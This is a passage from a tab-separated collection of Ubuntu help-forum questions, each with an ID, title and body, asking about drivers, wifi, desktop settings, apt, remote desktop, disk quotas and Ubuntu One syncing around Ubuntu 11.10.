without having dependency on ubuntu . so that if ever i have to remove ubuntu , windows will keep booting file without ubuntu .
99586	editing of a saved libreoffice writer document in ms wordpad	i am new to libre office . i have a problem with the format in which to save a office document ( when comparing to microsoft office ) i have set up my libre office writer doc ( call it a master document ) but as soon as i save the doc ( i save it in odt format ) it change the layout and then open it as a wordpad document - which do not have all the functions of the office writer . i have to edit a lot of documents for my work , add pics etc . please help . what do i do wrong ? i need the document in the same format it was ( office writer ) when i re-open it again for editing .
99590	can you make a bootable recovery partition for ubuntu ?	okay , there 's tons of questions about recovery partitions , but most , if not all pertain to windows . my question is , `` can you make a bootable recovery partition for ubuntu ? '' i 'm soon going to put ubuntu 11.10 on a separate disk so that i can have a full tb for windows 7 , and a full tb for ubuntu . but , i want to have it like windows has , and be able to recover ubuntu , should something go wrong and still have my current installation intact for later recovery . is this possible ? i 've been searching and searching , unable to find out how to do this , but there 's got to be someone who knows how to do it ! i 've contemplated using the contents of a custom installation iso , but , i do n't think you can `` burn '' an iso to a partition ... if anyone can help me with this , i 'd be ever so grateful !
99601	how apt-get selects from a list of alternative dependencies ?	i understand that in the depends : section of the deb control files , a package may specify alternative dependencies separated by | symbol to satisfy a single dependency . my question is , how does apt-get decides which one to install when there are alternatives ? is there a way to manually alter this selection using something similar to apt_preferences ? for example , if a package depends on java and in the depends section we have openjdk-6-jre | sun-java6-jre , how can i force apt-get to install openjdk-6-jre provided that the system does not have either packages installed ?
99606	unity search , how to get rid of certain results ?	when i want to run the calculator , i click on unity first icon ( dashboard ? ) , and then i start to type : ca : is showing the calculator as first result ( probably because zeitgeist recorded that its the app i use the most ) cal : is still showing the calculator as first result calc : is showing libreoffice calc as first result it 's annoying because if i hit `` enter '' libreoffice calc is launched : ( i tried to blacklist libreoffice calc in `` activity log manager '' but the behavior did n't change . so the main question is : how to prevent libreoffice calc to show up as first result without removing it completely from unity ? and to go further : why is it showing up as first result on search with `` calc '' and not with `` cal '' or `` ca '' ?
99607	how do i start vino-server at boot or login so i can control it remotely ?	so , here 's the situation . i have a server with xubuntu 11.10 , which is gon na be 12 kilometers away ( in a factory of my dad 's company ) in 3 days . so , in 3 days i have to come up with a solution how to administrate it remotely . the computer is in the other room for now , so it 's easy to go there , login and after that to control it remotely . i installed vino and made it to start when the session starts . but that means that you have to go , log in and then comeback on your laptop and administrate it remotely . so , my question is : how to make vino-server to start when xubuntu is loaded ( that means the login screen ) ? i 've done this two years ago on ubuntu 8.10 , but ca n't remember how . thanks in advance !
99617	where are compiz settings saved ?	i want to add my compiz settings to a git repo but i 'm having a hard time isolating the relevant files . my home directory is a bit of a mess here . i see gnome , compiz , and gconf everywhere . which are the right ones ? : ) thanks .
99635	how to associate an icon with a shell script ?	environment : ubuntu 11.10 i have a java application as a jar file . i have created a batch file that contains the following line : java -jar ~/myapp.jar when i execute this batch file , the java application works as expected . to create a desktop link , i copied this batch file into my `` desktop '' folder . this results in an icon appearing on the desktop . however , the icon shows `` java '' on it . i would like to associate a different icon to this desktop link . would appreciate it if someone can point me in the right direction .
99640	amd radeon hd 5650m	ok , so i 've got the 5650 as a discrete gpu and integrated 4200 . the problem is that i cant switch to 5650. fglrxinfo shows that 4200 is on , but aticonfig -px-list shows that discrete gpu is active . lspci shows this : 01:05.0 vga compatible controller [ 0300 ] : ati technologies inc m880g [ mobility radeon hd 4200 ] [ 1002:9712 ] 02:00.0 vga compatible controller [ 0300 ] : ati technologies inc madison [ amd radeon hd 5000m series ] [ 1002:68c1 ] ( rev ff ) as xorg looks like this : xorg device section : section `` device '' identifier `` aticonfig-device [ 0 ] -0 '' driver `` fglrx '' busid `` pci:1:5:0 '' endsection i thought that if i change busid to pci:2:0:0 it 'll help , but it wo n't . looks like ubuntu ca n't see 5650 as with pci:2:0:0 i cant run x. any suggestions what to do ? also i ca n't disable 4200 in bios
99642	how do i configure custom keyboard layout switching ?	i 'm using three keyboard layouts . one of them i use rarely , so i want to have one shortcut to switch between two layouts and another one to switch to the third one . switching between 3 layouts using a single shortcut is really inconvenient . how do i set xkb to do that ?
99643	how can i convert a 1080p wmv video to a 720p video ?	i have a 1080p wmv video that i 'd like to convert to a lower quality ( preferably 720p ) video . i would like to keep the audio intact . how can i accomplish this in ubuntu ?
99646	conky colors wont show up	i am running gnome 3 and am trying to get conky to work . when i just installed and ran conky in terminal , this showed up . so i googled how to make it look better and i found conky colors . i followed this guide and when i ran it , nothing showed up on the screen but conky shows up in the system monitor . i used this configuration before i installed it ./conky-colors -- cairo -- theme=elementary -- cpu=2 -- swap -- clock=cairo can someone please help me either make it show up again or configure it ? note : i 'm installing conky because screenlets just does n't look as good as conky colors .
99651	apt-get warning : no support for locale : en_us.utf8	i get this error each time i update the system using apt-get . what does this error mean ? any ideas on how to correct it ? ( i am running ubuntu 11.10 )
99655	i want u1 to delay before uploading files	i 'm an author and i am often working on quite large book files , say around 15meg , in libreoffice . libreoffice autosaves every few minutes , and i manually save too . when i 'm producing graphics or pdfs , i might be creating new files and overwriting old ones more than once per minute as i find errors and then overwrite the old files . no , the answer is n't to only produce a pdf only once , because many errors only become apparent when you convert the odt to a pdf and view the result . so i might create the 'same ' pdf a dozen times before i 'm happy with it . the same happens when i am creating png files from inkscape . u1 syncs immediately , so every time i save something , off it goes , uploading huge files over my mobile broadband connection and slowing my pc to a crawl . i end up having to disconnect u1 . for me , u1 is a very handy file backup solution and an easy way to sync my desktop and laptop . what i want is to be able to set the sync delay for u1 . i do n't want it to sync every time something changes , i want to , for example , have it sync every 30 minutes . the only way i can think to do this now is have u1 work off a copy of my files that i rsync with a cron job every 30 minutes . but that means using double the disk space , which is ridiculous . but it would be much nicer if u1 had a setting `` number of minutes to wait before syncing a changed file '' . is it possible ?
99656	illuminated usb keyboard flickers	does anyone know where i can download a driver for the vakoss tk-487-uk illuminated keyboard to run on ubuntu ? or at least how to control the usb port so that it stops flickering on and off . the usb port works fine but the keyboard is not recognized by ubuntu ... already read the post on youtube and script but did not work either ... tried changing usb ports , rebooting , etc . this has been going on for a week . the keyboard gets its power from the usb port . http : //answers.yahoo.com/question/index ? qid=20120128105854aajgmgn
99658	how to install zinio and adobeair in ubuntu 12.04 ?	as i use zinio a lot , i need to install adobe air on my ubuntu 12.04 . unfortunately the installation failed with message : sorry , an error has occured . adobe air could not be installed . install either gnome keyring or kde kwallet before installing adobe air . on ubuntu 11.10 it was still possible to install adobe air without any problem .
99659	how do i map network drives ?	i was wondering if it was possible to map windows network drives on ubuntu . if there is any way , please let me know how ! thanks for your help !
99662	amd 11.12 driver issue	i followed the steps letter by letter in this post ... gnome 3.2 problems in the shell however i have come to a problem that i do n't know how to solve ... it is saying that package build has failed and it could not process the .deb file . i would like to install this as it increases performance of unity . i have an ati mobility hd4250 graphics card . i also have been using the drivers that came out of the box with unity , did n't install the ones from the additional drivers list.. now after all of that , it says it ca n't open the driver installer . ok now with this new driver installed , everything appears to be choppy ... it did n't do that with the drivers that came in unity . i thought these were supposed to be an improvement ?
99666	top bar is eating my title bars	i 'm trying not to hate unity , but i 'm still not in love . if i have windows non-maximized , i often find that the window is stuck so the title bar is hidden by my unity top bar . i had to enable compiz 's window management grid just to give myself ctrl-alt-num6 as a way to force windows back into the visible screen . is there a way to keep windows from slipping up under the top bar ?
99669	does the thinkpad x41 touchscreen work with ubuntu ?	i was just wondering if laptop touch screens , such as the one on the thinkpad x41 were compatible with ubuntu . i have my new stylus coming in the mail , so i ca n't see for myself yet .
99679	ca n't get the gnome run dialog running with unity on 11.10	i 'd like to use the gnome version of alt+f2 to run commands since unity 's alt+f2 does n't support tab completion . so far i 've tried the following steps : open compizconfig settings manager go to general- > gnome compatibility assign run dialog to alt+f2 ( which warns me i 'm disabling 'key to execute a command ' which is under desktop- > ubuntuunity plugin- > key to execute a command ) restart computer after logging back in alt+f2 does n't do anything . i 've also gone to system settings- > keyboard- > shortcuts- > system- > show the run command prompt and set it to alt+f2 with no luck . any idea why the gnome run dialog is n't popping up ? i 've read other similar questions on this site which seemed to indicate the above steps have solved this problem in the past , but for some reason they are n't doing the trick for me . is this some kind of bug with my setup ? any ideas ? thanks ! !
99680	what can i do to make my ubuntu upgrade go as smoothly as possible ?	in the past , i 've upgraded ubuntu 10.10 to ubuntu 11.04 using the auto-upgrade function . unfortunately , the upgrade did n't go very well , and i ended up with a broken 11.04 . because of that , i had to manually reinstall 11.04 from a liveusb . after that , i did n't want to risk to get my system broken again , so six months after , i installed 11.10 from a liveusb too , instead of upgrading from 11.04 . but this method starts to annoy me , and i 'd like to use the auto-upgrade function to upgrade from 11.10 to 12.04 in april . besides of making a full-system backup , what can i do to make this ubuntu upgrade go as smoothly and error-free as possible ?
99681	atheros ar9285 does not work on 11.10	i have installed the 11.10 and everything went smoothly . the wifi card was automatically detected and connected to my wifi network , downloaded all the required files . but after the restart , i ca n't use any wireless connections ( only the cable ) , as it says that the device is not supported ( or handled ) . how can i fix this problem ? user @ laptop ~ $ lspci | grep network 03:00.0 network controller : atheros communications inc. ar9285 wireless network adapter ( pci-express ) ( rev 01 ) user @ laptop ~ $ uname -r 3.0.0-15-generic user @ laptop ~ $ rfkill list 0 : phy0 : wireless lan soft blocked : no hard blocked : no user @ laptop ~ $ iwconfig lo no wireless extensions . eth0 no wireless extensions . wlan0 ieee 802.11bgn essid : off/any mode : managed access point : not-associated tx-power=14 dbm retry long limit:7 rts thr : off fragment thr : off power management : off user @ laptop ~ $ sudo lsmod |grep ath ath9k 127538 0 mac80211 462092 1 ath9k ath9k_common 13839 1 ath9k ath9k_hw 312914 2 ath9k , ath9k_common ath 24067 2 ath9k , ath9k_hw cfg80211 199630 3 ath9k , mac80211 , ath edit : in the network manager i do n't see any wireless networks and the wireless network option is grayed out . i have installed wicd-daemon . it shows all the available wifi networks and the connection works fine . but how can i make it to work with the network manager ? it 's tray notifications are pretty convenient .
99691	monitor is n't being detected	hey guys i 'm having a problem with my monitor.. i just installed ubuntu 11.10 and the monitor appears to be unknown with a resolution of 800x600.. when i install the discrete graphics card driver ati the system reboots and now the monitor wo n't even turn up because of wrong refresh rates =\ my question is.. is there a way to force a resolution without the xrandr commands ? i mean by writing down on xorg.conf someway because i did that and it did n't worked , i already tried those commands aticonfig -- initial etc ... and edited again the xorg.conf and still not works . i managed to solve this problem on windows by entering the safe mode with low resolution and forcing up the 1920x1080 with 60hz . but in ubuntu it so much complicated i ca n't solve it i 'm almost giving up ; \
99692	customizing default icons in nautilus	i am trying to find out how to change the default folder icon for all folder . obviously , i could go one by one , but that does n't seem smart at all . also - those i did change individually ( the folders inside my home folder ) stayed with their original icons in the `` places '' menu on the left . is there any way of changing this ? thanks !
99695	how to i setup a local wordpress site ?	i want to create a site based on wordpress that is only accessible from my own machine ( localhost ) . in other words , i do not want my computer to be a server . i just want it to have all the files necessary for a website in /var/www/ , so that i can later copy-paste those files an another machine which will be a server . therefore i installed the wordpress package and i am about to install a graphical interface to manage the files . what should i do ? do i need somthing called lamp ? i have seen this question on wordpress answers , but i wonder if someone could provide instructions that are more ubuntu specific or easier to follow , especially if they are updated to the unity interface .
99703	how to get colored output from bash script ?	when i execute grep from within gnome-terminal , i get colored output - easily noticeable match , line-numbers ( -n ) with different colors etc but when i execute exactly same grep command through bash script i get plane output , without coloring is there a way i can get colored output by using bash script ?
99713	how can you figure out the dependencies of your project ?	i am going to start a project soon , and want to make sure all libs are included that are not natively installed . is there a way to check this without compiling on a clean machine ?
99715	can i sync ubuntu one contacts in lubuntu ?	i 'm using lubuntu 11.10 and have contacts in ubuntu-one , but do n't know how to get them synced . the default mail client is sylpheed , though any client would do .
99716	is there a plugin which let 's me select windows by keyboard hint ?	i 'm looking for a method which let 's me select windows by keyboard hint ( kinda how vimperator highlights links , but for the windows on my screen ) . ideally , it 'd first scale the windows then show me the hints , then typing the hint switches to the window . any thing out there ?
99718	how to make multiple des less messy ? specifically kde on ubuntu	on one of my laptops , i installed all of the popular des because i like to experiment with them . i have unity , gnome shell , kde , and xfce all installed . it seems that kde and gnome do n't `` get along '' , and makes things messed up such as words and characters on the screen . also , it appears that some applications get mixed up with each other . is there any way to make the des less `` messy '' ? - ubuntu 11.10 also , is there a way to install kde in a way that does n't install a bunch of other stuff that is n't needed . such as the kde sentences ... they are n't needed since i already have the gnome applications . also , when you install kde it also changes the shutdown and startup screen to kubuntu instead of ubuntu . in response to a comment on my question , i tried to install kde-core but i could not find it . and will installing kde mess up the fonts in my other des ?
99719	how to pay for an app in software center	i have seen several apps that cost an amount in software center to adquire them . so i have some questions : how does one pay for this apps ? what currency is supported ? what methods of payments are supported ? how does the system know i am the one that paid for a app if i format the pc . is there a way to store the app i bought ?
99721	can not load plugins in current version of calibre	the filter for loading downloaded plugins in calibre seems to be broken . the official manual for creating plugins says that plugins should bi in zip format with the appropriate init.py file . however the filter on the gui for loading plugins ( preferences - > plugins ( under advanced ) - > load plugins from file ) puts up a filter for filetypes of type `` plugins '' and does n't display any files . this seems to be an error in the configuration , but i do not know how to fix it . i 'm using the version of calibre in the current ubuntu release repositories ( 0.8.8 ) , unity interface . the problem has been documented elsewhere and it suggests this has been fixed in the most recent version , but i 'm not sure what the best solution is ( e.g . i 'd rather not use versions of packages setup outside the ubuntu package manager that wo n't receive the automatic updates , etc ) . any suggestions for the best work-around ?
99726	how to change firefox searchbar from google.com to google.com.tw	i install ubuntu 11.04 chinese version . but firefox 's title and search bar also in english . how to change back to chinese version ? the important thing for me is change search bar to google.com.tw .
99731	how do i start pulseaudio on barebones x11 server ?	i 'm using ubuntu 11.10 with xdmx/xmonad without gnome on a macbook air 4,2 . xdmx is an x server that allows you to use other linux computers running x11 as monitors . literally , monitors connected by ethernet . xmonad is a window manager that is like vim for your desktop . it manages your windows for you so you can focus on more important things like programming . when i go onto my computer , i first stop gnome with sudo service gdm stop and then run xinit & xmonad . this means that xmonad is running directly on top of a bare bones x11 server . unfortunately , there is no sound and doing sneilan @ sneilan-macbookair : ~ $ sudo service pulseaudio start * pulseaudio configured for per-user sessions does n't turn it on . if i run alsamixer , i get sneilan @ sneilan-macbookair : ~ $ alsamixer can not open mixer : no such file or directory sound works normally in gnome and xmonad running on top of gnome . how would i start my sound up without going into gnome ? thank you for your time .
99733	switched from nvidia to radeon gpu . now my screen is all garbled . how do i install the driver ?	i found this page , but it does n't seem to address actually installing anything , just configuration and whether you can use some unmentioned tool or not . i tried doing a software update , the hardware drivers application does nothing , and i 'm thinking the easiest thing to do might be just to back up my home folder and reinstall . is this the best way to do this ?
99736	how do i stop the service sudo ?	i want to make it impossible for any root commands to be issued during a live boot session . i do n't want anyone being able to sign in as root . period ! so , is it possible to stop the sudo service ? if so , would this accomplish what i 'm trying to do ? i tried the three possible stop service commands below but chkconfig -- list show sudo still working : ( 1 ) sudo stop sudo ( 2 ) sudo /etc/init.d/sudo stop ( 3 ) sudo service sudo stop
99739	how can i test the integrity of a backup made with backup ( deja dup ) ?	i 'm running 11.10 and did a backup with the default program titled `` backup '' ( deja dup ) . how can i know that it backed up my files correctly / completely ?
99740	document folder on sidebar points to ubuntu one/documents	whenever i click on documents on the computer menu , it directs me to the documents folder i had in ubuntu one ( which i have uninstalled ) and i get the following error message : could not find `` /home/dposnanski/ubuntu one/documents '' how can i change it so it directs me to `` /home/dposnanski/documents '' instead ? here 's a screenshot thank you !
99743	how can i add to a already running process an additional 'shutdown ' command ?	on a regular basis i forget to add & & shutdown -h now to a long-running process . is there any way to add a shutdown -h now command after the first command was invoked ? it is not intended to interrupt the ongoing process . maybe it is possible to watch the pid ?
99744	cd/ dvd/ blu-ray device undectable	i ca n't get my fresh install of ubuntu 11.10 to recognize that i 've got a drive for cds , dvds , and blu-rays ... here 's the output of a couple of commonly-requested terminal commands in other forum posts i 've read on the topic : $ ls -l /dev/ { cd , dvd } \* ls : can not access /dev/cd* : no such file or directory ls : can not access /dev/dvd* : no such file or directory $ sudo lshw -c disk *-disk:0 description : ata disk product : st9250421asg vendor : seagate physical id : 0 bus info : scsi @ 2:0.0.0 logical name : /dev/sda version : de12 serial : 5th00m12 size : 232gib ( 250gb ) capabilities : partitioned partitioned : dos configuration : ansiversion=5 signature=00099b7e *-disk:1 description : ata disk product : st9250421asg vendor : seagate physical id : 1 bus info : scsi @ 3:0.0.0 logical name : /dev/sdb version : de12 serial : 5th00hhy size : 232gib ( 250gb ) configuration : ansiversion=5 $ sudo lshw -c drive additionally , here 's my fstab file : \ # /etc/fstab : static file system information . \ # \ # use 'blkid ' to print the universally unique identifier for a \ # device ; this may be used with uuid= as a more robust way to name devices \ # that works even if disks are added and removed . see fstab ( 5 ) . \ # \ # < file system > < mount point > < type > < options > < dump > < pass > proc /proc proc nodev , noexec , nosuid 0 0 \ # / was on /dev/sda1 during installation uuid=3112a024-7483-447b-9069-c6d0b5ed23d4 / ext4 errors=remount-ro 0 1 \ # swap was on /dev/sda5 during installation uuid=5742166e-368f-4374-b188-a1ce61faadaa none swap sw 0 0 sorry , i really do n't know much about the linux auto-detect/ mount process . any help would be greatly appreciated !
99746	is there any gui tool for mutter customization ?	i recently switched from gnome shell to the gnome 3 fallback mode , and i 'm using mutter for my window manager . is there any tool that will allow me to customize it to an extent , similar to the compiz config settings manager for compiz ?
99752	no menu bar in gnome-shell	i installed the maximus and the gnome-shell-extension-window-buttons to get unity like buttons and after that menu bar options like file , edit and view is not showing up . so i removed the maximus and gnome-shell-extension-window-buttons , but there was no change . i tried all the shortcuts like alt + f , alt + f10 and many more .
99755	show available space for various drives in nautilus	on left side of nautilus , various drives and device list appears , i want it show used memory and available memory bar ( like windows ) below drive names , is there any way i can do it ?
99759	does compiling a linux kernel make the os faster ?	does compiling a downloaded linux kernel ( e.g 3.2 ) make the os ( e.g ubuntu ) faster on that specific machine ?
99760	how to change login screen background on 11.10	how do i change the background of the login screen on 11.10 i have tried simple-lightdm-manager and now all i get is a black screen with dots and the logo
99762	e-book-reader style desktop environment for 11.10 ?	out of many desktop environments available around i wanted to know which satisfy my needs . i want 1 ) quick minimal desktop . 2 ) support for pdf and doc , no need of video . 3 ) need wifi , no need of bt and ether . 4 ) super long battery life . 5 ) minimal browser
99767	can a folder have 2 or more owners ?	can i set 2 or more owners for one folder ? for example : 2 users can read/write , dc group users can read , others ca n't see how to i achieve the above configuration on that folder ?
99768	update manager wo n't collect upgrades for me	i have recently installed 11.10 and the update manager informs me i have hundreds of updates . when attempting to install them i get the message 'requires the installation of untrusted packages ' . after closing this , it takes me back to where i came from , hence taking me through the same loop . any ideas please . newb .
99774	exclude packages from `apt-get upgrade`	is it possible to upgrade all packages except a given package ? is there something like apt-get upgrade -- exclude package_to_exclude ?
99775	dell inspiron 1545 wired and wireless do not work	when i realized my wireless was n't working with ubuntu , i plugged my laptop in to try and figure out the problem online - only to find it does n't work that way , either . the problem is n't my internet/ cords because i 'm using both right now via my wireless desktop . i 'm just getting in to ubuntu and would appreciate any assistance . i 've looked around but the only similar questions i could find were about the wireless problem - but i have to deal with the wired problem , first . let me know what info i need to give . ~ $ lspci -knn | grep -i net -a2 09:00.0 ethernet controller [ 0200 ] : marvell technology group ltd. 88e8040 pci-e fast ethernet controller [ 11ab:4354 ] ( rev 13 ) subsystem : dell device [ 1028:02aa ] kernel driver in use : sky2 -- 0c:00.0 network controller [ 0280 ] : broadcom corporation bcm4312 802.11b/g lp-phy [ 14e4:4315 ] ( rev 01 ) subsystem : dell wireless 1397 wlan mini-card [ 1028:000c ] kernel modules : ssb ~ $ rfkill list all 0 : dell-wifi : wireless lan soft blocked : yes hard blocked : yes the output of lsmod : http : //pastebin.com/dqnwkcqz
99783	different launchers for different workspaces ?	i want to have different sidebar launchers for different workspaces , eg internet apps in first , entertainment apps launchers in second , games apps launchers in third etc how can i do it ?
99787	gnome shell 's search function does n't work properly	i 've just installed gnome shell on ubuntu 11.10 . i toyed a little with some gnome shell extensions , and now suddenly , the search box in the main menu does n't work properly . when i search for an application or a file , the corresponding application or file does n't show up . i removed all the extensions but nothing changed . i even reinstalled gnome shell itself , but in vain . what should i do ?
99789	help with dial up	i am trying to set up a computer for my friend that has dial up . the problem is nothing i try can detect the modem . gnomeppp ca n't find it and i ca n't figure kppp out . i 've been looking all over the net on my ethernet trying to find an answer but i keep getting routed back here . i have also tried using scanmodem and it finds something like conexant systems , inc. hcf 56k data/fax/voice modem but the rest of it is really confusing . i 've also tried this but i 'm not very terminal savvy and it did n't work . it seems like i have to compile a driver but i do n't know which one or how to do it . i have also tried multiple modems . any help would be appreciated . thanks edit : scanmodem thinks the modem is disabled on startup . edit : i reinstalled ubuntu but the problem persists .
99790	how can i recover bluetooth on my lenovo s10-3 laptop ?	i have a lenovo s10-3 laptop . since approximately two weeks ago , bluetooth is not working anymore . i do n't see any icon or notification in the device manager . i checked my bios settings too , and listed down the devices , but the bios doesnât show any bluetooth information or notification either . i have no idea what happened to my laptop 's bluetooth . how can i get my bluetooth connection back ?
99793	how can i set a quota in /etc/fstab ?	i want to mount my /home in etc/fstab for quota limits how do i do that ? my ubuntu-server fstab # /etc/fstab : static file system information . # # use 'blkid ' to print the universally unique identifier for a # device ; this may be used with uuid= as a more robust way to name devices # that works even if disks are added and removed . see fstab ( 5 ) . # # < file system > < mount point > < type > < options > < dump > < pass > proc /proc proc nodev , noexec , nosuid 0 0 /dev/mapper/vg0-lv0 / ext4 errors=remount-ro 0 1 /dev/mapper/vg0-lv1 none swap sw 0 0 /dev/fd0 /media/floppy0 auto rw , user , noauto , exec , utf8 0 0 updated @ rinzwind fstab home /home ext4 defaults , usrquota 0 0 mount -o remount /home root @ ubuntu : /home/one # mount -o remount /home mount : /home not mounted already , or bad option after rebooting
99800	when i am trying to install apache apollo on ubuntu , it is giving command not found error	when i am trying to install apache apollo on ubuntu , it is not getting installed . it is showing apollo : command not found permissions to the apollo file are 777 . java_home is also properly set . can anybody help me out ? i have followed official installation guide properly . can you please help me out ?
99804	i would like to know if americas army 3 can be played on ubuntu 11.10 ?	i know that this is not serious question but i would really like to know ? play on linux provides steam account to install , but can u install aa3 ? thx for your answers
99809	keyboard , touchpad , mouse not working properly	okay i 'm really lost on this one . after installing amd catalyst driver 12.1 on my laptop , it worked after a few tweaks . i was jumping with joy prematurely because the driver finally worked , only to find out later after a reboot that the proprietary driver went nuts yet again ( same with the earlier amd graphics drivers last year i 've tried ) . as usual when using fglrx i get a black screen instead of gdm , and if i do manage to get to a desktop i get the error from amdcccle control panel that it can not initialize because the device or driver is not found ( something like that ) . so going back , ctrl+alt+f* keys are useless . after a couple reboots with the same result , i continued to recovery mode and deleted all fglrx related installs . i proceeded to reinstall a few packages as suggested on this page - http : //wiki.cchtml.com/index.php/ubuntu_natty_installation_guide # removing_catalyst.2ffglrx . note that i 've done this several times without issues but the flgrx drivers . whenever i reverted i always got everything back to normal . this time is not the same . keyboard and touchpad are not working . the wireless mouse will work after i plug in the receiver when the boot reaches gdm , or i unplug-plug it . this is not a hardware issue . on windows 7 and live ubuntu all 3 devices work properly without me doing anything .
99817	change file encoding info	i 'm having some trouble uploading text files using sftp . the trouble is , that the files on my ( windows ) client are utf-8 encoded , but after the upload they seem to be us-ascii encoded ( at least file -bi says so ) . the files have not been converted , i think only the meta data about the encoding is wrong . is there any way to change that information ? ( preferably multiple files/directories at once ) i 've tried uploading using filezilla as well as winscp , with different configurations ( force utf-8 enabled , automatic etc ... ) , but had no luck avoiding the issue .
99821	ca n't change text size in gedit	within gedit i can go to the menu edit > preferences > font & colours , and change the font size here , but this seems to change the font size for the application itself , when i print something it still has small text . how can i change the size of the text i 'm writing , not the application labels and menus etc ?
99822	sound output selection in dell xps 15 l502x	on a dell xps 15 l502x , i have a misbehaving feature which is sound output selection . in the sound settings dialog , we have headphones output & analog output . plugging the external speakers through the headphone plug should normally prompt the user to select which output to use ( headphones or analog ) , but that 's not the case yet ( it 's only available in windows 7 , a dell/realtek driver gui ) . the issue is that when i plug the external speakers or headphones , the output is switched automatically to headphones output and no sound is provided . to enable sound again , one has to mute and unmute using the keyboard or the sound settings on top panel . or to open sound settings and select analog output instead of headphones output . this is an issue reproducible in all dell xps 15 l502x running ubuntu 11.10 . does someone has a workaround before i report it as a bug ? thanks in advance .
99825	configuring screen timeout/lock based on location	i want to enable screen timeout and locking when my laptop is located in the lan of my company and i want to disable this when i 'm at home . for location detection i use whereami with a simple detection like this : default unknown testdhcp '172.16.* . * ' work testdhcp '192.168.36 . * ' home now i need to set the corresponding settings when i enter or leave the `` work '' network . but i have problems finding out where gnome stores this stuff . i already found out where to toggle the `` lock '' button in the screen configuration dialog . i do it like this in the whereami configuration : ! work su -c `` dconf write /org/gnome/desktop/screensaver/lock-enabled false '' k =work su -c `` dconf write /org/gnome/desktop/screensaver/lock-enabled true '' k this works so far . but i also need to configure the `` turn off after '' setting in the screen configuration dialog . i found these three keys in dconf which are influences by it : /org/gnome/desktop/session/idle-delay /org/gnome/settings-daemon/plugins/power/sleep-display-battery /org/gnome/settings-daemon/plugins/power/sleep-display-ac but when i change them manually then it does n't work and the screen dialog does n't read the new value either . so i guess there are more keys i have to change but i ca n't find them ( i search feature in this new dconf stuff would be nice ) . so what settings have i to change to disable/enable the screen timeout ?
99826	error in executing a command in ubuntu	i am a newbie to ubuntu . when i execute a command in a terminal i get an error . the command is : $ ./h_affine.ln -haraff -i img1.ppm -o img1.haraff -thres 1000 the error is : modglue : :ext_process : :fork : execvp failed . the above command is for converting an image to an array of values . please help to sort this out . i have no idea what this error means .
99833	can not install libsyck0-dev	i 've been trying to follow this tutorial to install nginx but my ubuntu 11.10 can not install libsyck0-dev . i am getting an error saying that package can not be found . any idea why it is happening ? thanks
99834	how do you see what packages are available for update	freebsd user joining your ranks . i 've been asked to look after an ubuntu server running 10.04 lts . i see from /usr/lib/update-notifier/update-motd-updates-available that there are a number of updates on the server however i do not see a way to tell which will be updated . would anyone be able to point me in the right direction so as i can see which packages will get updated when i run apt-get upgrade update : cant answer my own question at the moment so throwing this in here for the time being : along with the apt-get upgrade -- dry-run suggested below , /usr/lib/update-notifier/apt-check -p will list all packages that have updates available .
99835	how to save remote desktop connection ( vinagre ) names for ubuntu ?	remote desktop client comes already installed in ubuntu 11.10 ( named as vinagre ) . it 's a nice and one stop application for accessing remote machines using ssh , vnc , rdp ( typically to windows machines ) . however , i am not able to see any option for saving the names for the connections . everytime , i have to provide the machine name , username , password etc . details ? is there any add-on to enable saving the details of a connection ? for now , i have installed `` remmina '' ( sudo apt-get install remmina ) client , which has all these facilities . however , i am wondering why such trivial facility is not there in vinagre remote desktop ?
99843	error in executing a command in ubuntu ( modglue error )	i am a newbie to ubuntu . when i execute a command in a terminal i get an error . the command is : prompt > ./h_affine.ln -haraff -i img1.ppm -o img1.haraff -thres 1000 the error is : modglue : :ext_process : :fork : execvp failed . the above command is for converting an image to an array of values . please help to sort this out . i have no idea what this error says . after using strace command strace -f ./h_affine.ln -haraff -i img1.ppm -o img1.haraff -thres 1000 i get the following output execve ( `` ./h_affine.ln '' , [ `` ./h_affine.ln '' , `` -haraff '' , `` -i '' , `` img1.ppm '' , `` -o '' , `` img1.haraff '' , `` -thres '' , `` 1000 '' ] , [ /* 37 vars */ ] ) = -1 eacces ( permission denied ) dup ( 2 ) = 3 fcntl64 ( 3 , f_getfl ) = 0x2 ( flags o_rdwr ) fstat64 ( 3 , { st_mode=s_ifchr|0620 , st_rdev=makedev ( 136 , 0 ) , ... } ) = 0 mmap2 ( null , 4096 , prot_read|prot_write , map_private|map_anonymous , -1 , 0 ) = 0xb781a000 _llseek ( 3 , 0 , 0xbf932764 , seek_cur ) = -1 espipe ( illegal seek ) write ( 3 , `` strace : exec : permission denied\n '' , 32strace : exec : permission denied ) = 32 close ( 3 ) = 0 munmap ( 0xb781a000 , 4096 ) = 0 exit_group ( 1 ) = ? i could n't understand how rectify these errors . help me to sort this out .
99847	automatically mark emails as read in evolution 3.2.2 ?	how can i change settings in evolution 3.2.2 so that emails are marked read once i display them ? i know this is default behavior of pretty much any email client , however , i just ca n't find that option anymore . a tick box `` mark emails as read after xxx seconds '' used to be found under preferences/mail preferences/general in earlier but it seems gone now .
99851	unbuild . remove a built package	i was having issue with the vim-gnome package and command-t with vim not compiling with the system ruby . so i built vim with . sudo apt-get install mercurial hg clone https : //vim.googlecode.com/hg/ vim cd vim ./configure -- enable-rubyinterp make sudo make install but i made a mistake . when i did vim -- version | grep ruby i realised my error . i had forgotten to turn off rvm before compiling . -wl , -r -wl , /home/renshaw/.rvm/rubies/ruby-1.9.3-p0/lib -l/home/renshaw/.rvm/rubies/ruby-1.9.3-p0/lib -lruby -lpthread -lrt -ldl -lcrypt -lm -l/home/renshaw/.rvm/rubies/ruby-1.9.3-p0/lib but i ca n't get apt-get remove it and i can not see vim in /usr/bin/ . it still runs if i type vim , but how do i remove it so i can compile it properly ?
99853	changing the default folder icon	i am trying to change the default folder icon , so i 've googled a little and found out that i can do it ub /use/share/icons/my_theme/places problem is that under 'places ' the are numerous folders 16 22 24 32 48 64 96 scalable so , what folder do i need ? they all have folder.svg in them so i 'm not sure what to change . also - my icon is a .png file , how do i convert it to .svg ? thanks
99858	disable ubuntu one facebook sync	i have a question about the facebook sync . i activate this function as i had no contacts stored in ubuntu one . now i uploaded all my contacts to ubuntu one but i do n't see any fb contacts , link or merge . so i think i must reset the sync or ? but when i select `` disable facebook sync ( linked to : https : //one.ubuntu.com/contacts/sync ) '' nothing happens .
99859	switch off laptop backlight when locking screen	i 'm using an ibm thinkpad t61 and wish to have the backlight switched off when locking the screen.i 've been told to use gconf editor and un-check the backlight under apps- > gnome-power-manager ... sounds good but the powermanager does not appear in gconf-editor . so i googled around with the result to use dconf-editor . but where do i find the backlight now ?
